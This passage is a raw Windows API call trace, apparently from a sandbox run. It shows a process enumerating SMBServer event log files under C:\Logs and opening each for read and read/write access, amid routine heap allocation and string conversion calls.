dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0087.415] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.415] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.415] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx", cAlternateFileName="MIE3AD~1.EVT")) returned 1 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0087.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.417] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.417] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.417] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.417] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0087.417] AreFileApisANSI () returned 1 [0087.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx", lpUsedDefaultChar=0x0) returned 48 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.417] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.417] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.417] AreFileApisANSI () returned 1 [0087.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0087.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 48 [0087.418] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.418] GetFileType (hFile=0x424) returned 0x1 [0087.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.418] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.418] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.418] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.418] CloseHandle (hObject=0x424) returned 1 [0087.418] AreFileApisANSI () returned 1 [0087.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 48 [0087.419] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.419] GetFileType (hFile=0x424) returned 0x1 [0087.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.419] CloseHandle (hObject=0x424) returned 1 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0087.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0087.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0087.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0087.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0087.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0087.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0087.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0087.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0087.420] AreFileApisANSI () returned 1 [0087.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 48 [0087.420] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.420] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx", cAlternateFileName="MI8248~1.EVT")) returned 1 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0087.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.421] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.421] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.421] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.421] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.421] AreFileApisANSI () returned 1 [0087.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx", lpUsedDefaultChar=0x0) returned 55 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0087.421] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.421] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.421] AreFileApisANSI () returned 1 [0087.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75dc8 [0087.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 55 [0087.422] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.422] GetFileType (hFile=0x424) returned 0x1 [0087.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.422] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.422] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.423] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.423] CloseHandle (hObject=0x424) returned 1 [0087.423] AreFileApisANSI () returned 1 [0087.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75d50 [0087.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 55 [0087.423] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.423] GetFileType (hFile=0x424) returned 0x1 [0087.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.423] CloseHandle (hObject=0x424) returned 1 [0087.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.424] AreFileApisANSI () returned 1 [0087.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75eb8 [0087.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 55 [0087.424] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0087.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.424] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx", cAlternateFileName="MI4B6B~1.EVT")) returned 1 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 